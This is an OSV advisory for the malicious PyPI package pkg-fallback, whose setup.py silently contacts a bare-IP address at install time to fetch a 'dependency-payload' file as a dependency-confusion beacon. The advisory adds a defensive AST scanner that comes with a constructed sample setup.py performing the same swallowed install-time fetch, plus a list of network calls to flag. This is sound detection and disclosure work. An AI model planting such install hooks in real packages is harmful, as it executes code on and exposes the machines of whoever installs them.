MAL-2026-6557

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/pkg-fallback/MAL-2026-6557.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6557
Published
2026-06-28T06:01:28Z
Modified
2026-06-28T08:15:56.051092370Z
Summary
Malicious code in pkg-fallback (PyPI)
Details


Source: amazon-inspector (7f4ccaa9f059318782cd3b811f5bd6ea926e267e4b05dc4971d6acc6687d5d4f)

setup.py performs an unconditional urllib.request.urlopen() at install time to a hardcoded plaintext bare-IP endpoint http://157.254.194.200:8080/dependency-payload-1.0.0.tar.gz, with exceptions silently swallowed. This fires automatically during pip install (build/setup phase), confirming code execution on the installer's machine and disclosing the installer's network identity to attacker-controlled infrastructure. The distribution is published as 'pkg-fallback' but ships an unrelated 'string_kit' module described as 'string-kit' in README/PKG-INFO; the name/module divergence together with the install-time bare-IP beacon and the attacker-suggestive payload filename ('dependency-payload') is consistent with a dependency-confusion staging/enumeration package rather than a genuine utility.

Source: kam193 (4563c95d80446cbc0c815185ab9b3649b048c82a33b2d662523ce4760dbc6856)

Package exploits dependency confusion. A beacon request is used to report usage back, but no additional information is exfiltrated.


Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-beacon-dependency-confusion

Reasons (based on the campaign):

  • typosquatting

  • dependency-confusion
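The pattern both sources describe (a network call that runs simply because setup.py is executed, wrapped in an exception handler that discards failures) can be flagged statically before a package is installed. The following is an added example, not code from either source or from the package; the sample setup.py and its placeholder address are constructed to mirror the description above, and the list of network callables is an assumption to extend for your environment.

```python
import ast

# Constructed sample mirroring the advisory's description of pkg-fallback's setup.py:
# an unconditional install-time fetch of a hardcoded plaintext bare-IP URL (placeholder
# address, not the one in the advisory), with the exception silently swallowed.
SAMPLE_SETUP_PY = '''
from setuptools import setup
import urllib.request
try:
    urllib.request.urlopen("http://203.0.113.10:8080/dependency-payload-1.0.0.tar.gz")
except Exception:
    pass
setup(name="pkg-fallback", version="1.1.0", packages=["string_kit"])
'''

# Assumed set of callables that open a connection; a build step should need none of them.
NETWORK_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                 "requests.get", "requests.post", "socket.create_connection", "socket.socket"}

def _import_map(tree):
    """Map each local name to the dotted module/attribute it was imported as."""
    names = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                names[a.asname or a.name.split(".")[0]] = a.name if a.asname else a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                names[a.asname or a.name] = f"{node.module}.{a.name}"
    return names

def _dotted(node):
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def find_install_time_network_calls(source):
    """Return (resolved callee, line, exception_swallowed) for every network call that runs
    when setup.py is merely executed, i.e. outside any def/class/lambda body."""
    tree = ast.parse(source)
    imports, findings = _import_map(tree), []
    def walk(node, swallowed):
        for child in ast.iter_child_nodes(node):
            if isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef, ast.Lambda)):
                continue  # only code that runs at install time matters here
            if isinstance(child, ast.Call) and (name := _dotted(child.func)):
                head, _, rest = name.partition(".")
                resolved = imports.get(head, head) + (f".{rest}" if rest else "")
                if resolved in NETWORK_CALLS:
                    findings.append((resolved, child.lineno, swallowed))
            inner = swallowed  # a handler that is only `pass` hides the beacon's failures
            if isinstance(child, ast.Try):
                inner = inner or any(all(isinstance(s, ast.Pass) for s in h.body) for h in child.handlers)
            walk(child, inner)
    walk(tree, False)
    return findings

if __name__ == "__main__":
    for callee, line, quiet in find_install_time_network_calls(SAMPLE_SETUP_PY):
        print(f"line {line}: {callee} at install time" + (" (errors swallowed)" if quiet else ""))
```

Run it over the sdist's setup.py before `pip install` (or in a pre-install gate) and treat any hit as a reason to block the package and review it by hand.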

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.1.0"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-06-28T06:01:28Z",
            "sha256": "7f4ccaa9f059318782cd3b811f5bd6ea926e267e4b05dc4971d6acc6687d5d4f",
            "id": "IN-MAL-2026-007697",
            "ranges": [
                {
                    "type": "ECOSYSTEM",
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ]
                }
            ],
            "import_time": "2026-06-28T06:50:42.931191475Z"
        },
        {
            "versions": [
                "1.1.0"
            ],
            "modified_time": "2026-06-28T07:22:27.366925Z",
            "sha256": "4563c95d80446cbc0c815185ab9b3649b048c82a33b2d662523ce4760dbc6856",
            "id": "pypi/GENERIC-beacon-dependency-confusion/pkg-fallback",
            "source": "kam193",
            "import_time": "2026-06-28T08:10:57.722648683Z"
        }
    ]
}
References
Credits

Affected packages

PyPI / pkg-fallback

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)

Affected versions

1.*
1.1.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "pkg_fallback-1.1.0.tar.gz",
            "hashes": {
                "md5": "6f78fa86c4f5c320aec88febbcd47878",
                "blake2b_256": "bfdd6c973cf80595a3f50e4d3e2c19dff3f72fda1ec86eb37689573bae86a5a9",
                "sha256": "272ff22462e20ef5fd5766729843adfc577ff8a72c6c87e809c56efc6e042921"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "setup.py",
            "tlsh": "6901ce85ce8078e5c9dba64548799c5e12326b033d01f4d9bb8983583f4d2dfcb36259",
            "sha256": "e63cda868cf61706d3d8666c109977ecbcbc7b83f0d784a0330a4196bf034822"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/pkg-fallback/MAL-2026-6557.json"